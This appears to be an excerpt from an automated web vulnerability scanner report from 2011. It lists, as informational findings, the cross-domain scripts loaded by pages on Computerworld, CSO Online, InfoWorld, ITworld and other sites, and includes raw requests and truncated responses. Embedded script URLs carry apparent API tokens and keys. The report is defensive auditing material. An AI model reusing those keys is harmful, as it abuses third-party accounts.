<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
</iframe>
<script type="text/javascript" src="http://www.blogger.com/static/v1/jsbin/957670695-comment_from_post_iframe.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/3871175110-widgets.js"></script>
...[SNIP]...

16.71. http://www.computerworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computerworld.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse
http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523
http://content.dl-rms.com/rms/mother/573/nodetag.js
http://jlinks.industrybrains.com/jsct?sid=756&ct=COMPUTERWORLD_ROS&num=5&layt=3v1&fmt=simp
http://s.bit.ly/TweetAndTrack.js?v=1.01
http://static.polldaddy.com/p/5467434.js
http://www.dinclinx.com/?s=581&e=0&t=687&f=javascript
http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e
http://www.simplyhired.com/c/job-widget/js/widget.js

Request

GET / HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
piExres: Sun, 04 Sep 2011 14:09:31 GMT
nnCoection: close
Cheac-Control: private
ETag: "KXAOEEJGPLSLXSYXL"
Cache-Control: public, max-age=253
Expires: Sun, 04 Sep 2011 14:10:40 GMT
Date: Sun, 04 Sep 2011 14:06:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
</script>
           <script type="text/javascript" src="http://content.dl-rms.com/rms/mother/573/nodetag.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523"></script>
<script type="text/javascript" charset="utf-8" src="http://s.bit.ly/TweetAndTrack.js?v=1.01"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e"></script>
...[SNIP]...
<div class="module" id="itjobs_module">
   <script type="text/javascript" src="http://www.dinclinx.com/?s=581&e=0&t=687&f=javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.simplyhired.com/c/job-widget/js/widget.js"></script>
...[SNIP]...


<script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/5467434.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=756&ct=COMPUTERWORLD_ROS&num=5&layt=3v1&fmt=simp"></script>
...[SNIP]...

16.72. http://www.computerworld.com/s/newsletters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computerworld.com
Path:	/s/newsletters

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse
http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e

Request

GET /s/newsletters HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.73. http://www.computerworld.com/secure-us.imrworldwide.com/cgi-bin/m previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computerworld.com
Path:	/secure-us.imrworldwide.com/cgi-bin/m

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse
http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523
http://content.dl-rms.com/rms/mother/573/nodetag.js
http://jlinks.industrybrains.com/jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE&num=5&layt=1&fmt=simp
http://s.bit.ly/TweetAndTrack.js?v=1.01
http://w.sharethis.com/button/sharethis.js
http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e

Request

GET /secure-us.imrworldwide.com/cgi-bin/m HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
ETag: "KXAOEEJGPLMYMRYXL"
Server: Apache/2.2.3 (CentOS)
Cteonnt-Length: 38753
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: public, max-age=600
Date: Sun, 04 Sep 2011 14:06:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
       <script type="text/javascript" src="http://content.dl-rms.com/rms/mother/573/nodetag.js"></script>
   <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=43a7f58f-0621-4edd-9c6b-183f7ba318f8&type=website&onmouseover=false&button=false&embeds=true&send_services=email%2Csms%2Caim&post_services=facebook%2Clinkedin%2Cstumbleupon%2Creddit%2Cslashdot%2Cybuzz%2Cdelicious%2Cmixx%2Ctwitter%2Cdigg%2Cfark%2Cfriendfeed"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523"></script>
<script type="text/javascript" charset="utf-8" src="http://s.bit.ly/TweetAndTrack.js?v=1.01"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE&num=5&layt=1&fmt=simp"></script>
...[SNIP]...

16.74. http://www.computerworld.com/spring/newsletter/1004/Computerworld%20Daily/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computerworld.com
Path:	/spring/newsletter/1004/Computerworld%20Daily/

Issue detail

The response dynamically includes the following script from another domain:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

Response

16.75. http://www.computerworld.com/spring/newsletter/1019/Networking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computerworld.com
Path:	/spring/newsletter/1019/Networking/

Issue detail

The response dynamically includes the following script from another domain:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /spring/newsletter/1019/Networking/ HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Sun, 04 Sep 2011 14:10:44 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLNWRSYXL"
Cache-Control: public, max-age=308
Expires: Sun, 04 Sep 2011 14:11:37 GMT
Date: Sun, 04 Sep 2011 14:06:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<t
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

16.76. http://www.computerworld.com/spring/newsletter/1021/Operating%20System/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computerworld.com
Path:	/spring/newsletter/1021/Operating%20System/

Issue detail

The response dynamically includes the following script from another domain:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /spring/newsletter/1021/Operating%20System/ HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.77. http://www.computerworld.com/spring/newsletter/1025/Security/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computerworld.com
Path:	/spring/newsletter/1025/Security/

Issue detail

The response dynamically includes the following script from another domain:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /spring/newsletter/1025/Security/ HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Sun, 04 Sep 2011 14:10:45 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLUVRSYXL"
Cache-Control: public, max-age=202
Expires: Sun, 04 Sep 2011 14:09:51 GMT
Date: Sun, 04 Sep 2011 14:06:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<t
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

16.78. http://www.computerworld.com/spring/newsletter/1028/The%20Weekly%20Top%2010/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computerworld.com
Path:	/spring/newsletter/1028/The%20Weekly%20Top%2010/

Issue detail

The response dynamically includes the following script from another domain:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Sun, 04 Sep 2011 14:10:45 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLKVRSYXL"
Cache-Control: public, max-age=238
Expires: Sun, 04 Sep 2011 14:10:29 GMT
Date: Sun, 04 Sep 2011 14:06:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<t
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

16.79. http://www.csoonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://api.demandbase.com/api/v1/ip.json?token=efb6d514cdcaa8a88ed8190a5011fe9532325aa8&callback=dbase_parse
http://apis.google.com/js/plusone.js
http://content.dl-rms.com/rms/mother/18704/nodetag.js
http://google.com/coop/cse/brand?form=searchbox_005964914320811651291:udjy26klife
http://jlinks.industrybrains.com/jsct?sid=757&ct=CSO_HP_ROS&tr=MARKETPLACE&num=3&layt=1&fmt=simp

Request

GET / HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:06:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600, public, max-age=600, public, max-age=600
Expires: Sun, 04 Sep 2011 14:16:31 GMT
Keep-Alive: timeout=5, max=495
Connection: Keep-Alive
Set-Cookie: NSC_djp.dpn=44593c703660;expires=Sun, 04-Sep-11 14:16:41 GMT;path=/
Content-Length: 57173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=efb6d514cdcaa8a88ed8190a5011fe9532325aa8&callback=dbase_parse"></script>

<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/18704/nodetag.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_005964914320811651291:udjy26klife"></script>
...[SNIP]...


<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id="resource_center">

<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=757&ct=CSO_HP_ROS&tr=MARKETPLACE&num=3&layt=1&fmt=simp"></script>
...[SNIP]...

<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...

16.80. http://www.cwsubscribe.com/cgi-win/cw.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cwsubscribe.com
Path:	/cgi-win/cw.cgi

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse
http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523
http://content.dl-rms.com/rms/mother/573/nodetag.js
http://s.bit.ly/TweetAndTrack.js?v=1.01
http://w.sharethis.com/button/sharethis.js
http://www.computerworld.com/common/javascript/AC_RunActiveContent.js
http://www.computerworld.com/common/javascript/urchin.js
http://www.computerworld.com/resources/scripts/lib/click_tracking.js
http://www.computerworld.com/resources/scripts/lib/demandbase.js?e
http://www.computerworld.com/resources/scripts/lib/doubleclick_ads.js?f
http://www.computerworld.com/resources/scripts/lib/global.js?143
http://www.computerworld.com/resources/scripts/lib/jquery-latest.js?20100325
http://www.computerworld.com/resources/scripts/lib/jquery.form.js
http://www.computerworld.com/resources/scripts/lib/jquery.tooltip.js
http://www.computerworld.com/resources/scripts/lib/jquery.tweet.js
http://www.computerworld.com/resources/scripts/lib/referrer.js
http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e

Request

GET /cgi-win/cw.cgi HTTP/1.1
Host: www.cwsubscribe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 14:06:31 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 78234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Computerworld Subscription Services</title>
<meta http-equiv="Content-Ty
...[SNIP]...
</script>

   <script type="text/javascript" src="http://www.computerworld.com/resources/scripts/lib/referrer.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" src="http://content.dl-rms.com/rms/mother/573/nodetag.js"></script>
   <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=43a7f58f-0621-4edd-9c6b-183f7ba318f8&type=website&onmouseover=false&button=false&embeds=true&send_services=email%2Csms%2Caim&post_services=facebook%2Clinkedin%2Cstumbleupon%2Creddit%2Cslashdot%2Cybuzz%2Cdelicious%2Cmixx%2Ctwitter%2Cdigg%2Cfark%2Cfriendfeed"></script>

       <script type="text/javascript" src="http://www.computerworld.com/resources/scripts/lib/doubleclick_ads.js?f"></script>
   <script type="text/javascript" src="http://www.computerworld.com/resources/scripts/lib/demandbase.js?e"></script>
   <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...
</script>


<script type="text/javascript" language="Javascript" src="http://www.computerworld.com/common/javascript/AC_RunActiveContent.js"></script>
...[SNIP]...
</head>

<script src="http://www.computerworld.com/resources/scripts/lib/jquery-latest.js?20100325"></script>
<script type="text/javascript" src="http://www.computerworld.com/resources/scripts/lib/jquery.form.js"></script>
<script type="text/javascript" src="http://www.computerworld.com/resources/scripts/lib/jquery.tooltip.js"></script>
<script src="http://www.computerworld.com/resources/scripts/lib/jquery.tweet.js" type="text/javascript"></script>
<script src="http://www.computerworld.com/resources/scripts/lib/click_tracking.js" type="text/javascript"></script>
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523"></script>

<script type="text/javascript" charset="utf-8" src="http://s.bit.ly/TweetAndTrack.js?v=1.01"></script>
<script type="text/javascript" src="http://www.computerworld.com/resources/scripts/lib/global.js?143"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e"></script>
...[SNIP]...

<script src="http://www.computerworld.com/common/javascript/urchin.js" type="text/javascript"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.fmpub.net/zone/2555
http://static.fmpub.net/zone/936
https://apis.google.com/js/plusone.js

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:06:32 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Last-Modified: Sun, 04 Sep 2011 14:00:48 GMT
ETag: "f73f507c2e6ec6ba724837a6239f8f63"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/2555'></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/936'></script>
...[SNIP]...

16.82. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Request

Response

16.83. http://www.infoworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.infoworld.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.demandbase.com/api/v1/ip.json?token=cee711554501392246965521cfb9ab9aa83ae949&callback=OPG.Demandbase.dbase_parse
http://content.dl-rms.com/rms/mother/574/nodetag.js
http://jlinks.industrybrains.com/jsct?sid=758&ct=INFOWORLDCOM_ROS&num=5&layt=2&fmt=simp
http://www.dinclinx.com/?s=1051&e=0&t=695&f=javascript

Request

GET / HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:06:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: HIT
Etag: "1315144015-0"
Cache-Control: public, max-age=0, public, max-age=600
Last-Modified: Sun, 04 Sep 2011 13:46:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
lang="en"
dir
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=cee711554501392246965521cfb9ab9aa83ae949&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
<div id="block-block-51" class="clear-block block block-block">
<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/574/nodetag.js"></script>
...[SNIP]...
<div id="block-infoworld-itwhitepapers" class="clear-block block block-infoworld">
<script type="text/javascript" src="http://www.dinclinx.com/?s=1051&e=0&t=695&f=javascript"></script>
...[SNIP]...
<div id="block-infoworld-technology_marketplace" class="clear-block block block-infoworld">
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=758&ct=INFOWORLDCOM_ROS&num=5&layt=2&fmt=simp"></script>
...[SNIP]...

16.84. http://www.itwhitepapers.com/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.itwhitepapers.com
Path:	/images/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://jsc.madisonlogic.com/jsc?pub=88&pgr=75&src=3971&layrf=5657&num=1

Request

GET /images/favicon.ico HTTP/1.1
Host: www.itwhitepapers.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=apjgghpsi7e8kapncc03aq4l16; 2f1511d467aa3beecdd06ea6e9b79919=a26b837c116af36b6395df4561ff0dda

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:47:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:47:18 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
</div><script type="text/javascript" src="http://jsc.madisonlogic.com/jsc?pub=88&pgr=75&src=3971&layrf=5657&num=1"></script>
...[SNIP]...

16.85. http://www.itwhitepapers.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.itwhitepapers.com
Path:	/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://jsc.madisonlogic.com/jsc?pub=88&pgr=75&src=3968&layrf=5654&num=5
http://jsc.madisonlogic.com/jsc?pub=88&pgr=75&src=3971&layrf=5657&num=1

Request

GET /index.php HTTP/1.1
Host: www.itwhitepapers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 14:06:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:06:45 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
</h1>
<script type="text/javascript" src="http://jsc.madisonlogic.com/jsc?pub=88&pgr=75&src=3968&layrf=5654&num=5"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://jsc.madisonlogic.com/jsc?pub=88&pgr=75&src=3971&layrf=5657&num=1"></script>
...[SNIP]...

16.86. http://www.itworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.itworld.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.demandbase.com/api/v1/ip.json?token=2bfb26e0f878776f913fb41e5aa2daecc7ba0637&callback=OPG.Demandbase.dbase_parse
http://api.demandbase.com/api/v1/ip.json?token=bacca8eba8bded95b5dd46f7a3d8ebc282966537&callback=dbase_parse
http://content.dl-rms.com/rms/mother/28184/nodetag.js
http://platform.twitter.com/widgets.js
http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
http://w.sharethis.com/button/buttons.js
http://www.google-analytics.com/urchin.js
http://www.google.com/jsapi
http://www.simplyhired.com/c/job-widget/js/widget.js

Request

GET / HTTP/1.1
Host: www.itworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Sun, 04 Sep 2011 13:58:47 +0000
Vary: Cookie
ETag: "1315144727"
Content-Type: text/html; charset=utf-8
Content-Length: 165532
X-Cacheable: YES
Date: Sun, 04 Sep 2011 14:06:49 GMT
X-Varnish: 2120810049 2120804393
Via: 1.1 varnish
age: 0
X-Cache: HIT
X-Cache-Hits: 17
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600
Connection: close

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="description" content="IT news and breaking technology stories covering IT security, cloud computing, virtualization, and more." />
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=2bfb26e0f878776f913fb41e5aa2daecc7ba0637&callback=OPG.Demandbase.dbase_parse"></script>
<script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2" ></script>
